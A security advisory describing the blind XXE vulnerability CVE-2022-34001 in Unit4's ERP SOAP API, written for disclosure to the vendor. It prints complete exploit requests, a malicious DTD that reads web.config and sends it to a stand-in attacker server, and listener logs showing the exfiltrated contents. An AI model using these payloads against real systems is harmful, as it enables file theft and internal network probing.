Prism Infosec Identified an XXE vulnerability within Unit4’s Enterprise Resource Planning (ERP) software. This has been assigned CVE-2022-34001. Unit4’s ERP software is a well-known enterprise management suite, which includes financial and project management tools.
Prism Infosec discovered a blind XXE within a specific function of the ERP software. This would allow an authenticated attacker to read arbitrary files from the host server.
The ERP API supported the use of SOAP calls; Curiously, the ‘ExecuteServerProcessAsynchronously’ SOAP call allowed the insertion of arbitrary XML within its body. To test for XXE, Prism used a simple HTTP outbound call to a Burp Collaborator server to confirm that the XML allowed for entity expansion, and also allowed the SYSTEM call.
The following request shows a snippet of the ‘ExecuteServerProcessAsynchronously’ SOAP call with the embedded XXE payload within XML tags:
POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
</Variant>
<Xml>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://burp_collaborator.com"> %dtd;]><xxx/>]]>
</Xml>
</input>
<credentials>
…[REDACTED]…
</credentials>
This resulted in an HTTP request to the Prism Infosec controlled server:
The request was received from IP address [REDACTED] at 2022-Mar-01 11:24:45 UTC.
GET / HTTP/1.1
Host: burp_collaborator.com
Connection: Keep-Alive
This confirms that entity expansion was enabled, along with being able to leverage protocols such as HTTP and FILE. As SOAP request only responded with an error message, this attack was considered ‘blind’ – so out of band techniques were required to exfiltrate data from the host.
On an attacker-controlled server, the following malicious DTD file was hosted (test.xml):
<!ENTITY % start "<[CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % outfile SYSTEM "file:///E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config">
<!ENTITY % goout "<!ENTITY % pop SYSTEM 'http://attacker_controlled_server:8000/%start;%outfile;
%end;'>">
The SOAP call was then initiated but referencing the malicious DTD along with the parameter entities to exfiltrate the data:
POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
<Variant>104</Variant>
<Xml>
<![CDATA[
<!DOCTYPE doc[
<!ENTITY % dtd SYSTEM "http://attacker_controlled_server:8000/test.xml">
%dtd;
%goout;
%pop;
]>
]]>
</Xml>
</input>
--[Cut]--
On the attacker controlled server, a listener was set up to serve the malicious DTD, and also catch the contents of the file being read:
Serving HTTP on 0.0.0.0 port 8000 ...
api-services_ip - - [02/Mar/2022 12:54:16] "GET /test.xml HTTP/1.1" 200 -
api-services_ip - - [02/Mar/2022 12:54:04] "GET /%3C[CDATA[%0D%0A%3C!--%0D%0A%20%20For%20more%20information%20on%20how%20to%20configure%20your%20ASP.NET%20application,
%20please%20visit%20%0D%0A%20%20http://go.microsoft.com/fwlink/?LinkId=301879%0D%0A%20%20--%3E%0D%0A%3Cconfiguration%3E%0D%0A%20%20%3CconfigSections
--[Cut]--
The decoded data reveals the content of the “E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config” file on the api-services host:
/<[CDATA[
<!--
For more information on how to configure your ASP.NET application, please visit
http://go.microsoft.com/fwlink/?LinkId=301879
-->
<configuration>
<configSections>
<section name="agresso.web.api" type="Agresso.Web.Http.Configuration.WebApi.WebApiConfigurationSection, Agresso.Web.Http" />
</configSections>
--[Cut]—
The XXE could also be leveraged to make Server-Side Request Forgery (SSRF) calls within the internal network; mapping out the internal network, and making arbitrary requests to any internal hosts.
Prism Infosec contacted the vendor (Unit 4); and supplied all the necessary information so that Unit 4 could confirm and subsequently remediate the vulnerability. Unit 4 responded in a timely matter and started working on a fix for all customers.
Although the test was completed on the latest version of Unit 4 ERP, we have been advised that previous versions of the software may also be affected.
Note: Prism Infosec did not confirm if the vulnerability had been patched; No further testing was conducted after the initial engagement.
Timeline – CVE-2022-34001
Vulnerability was discovered and written by Alexis Vanden Eijnde of Prism Infosec.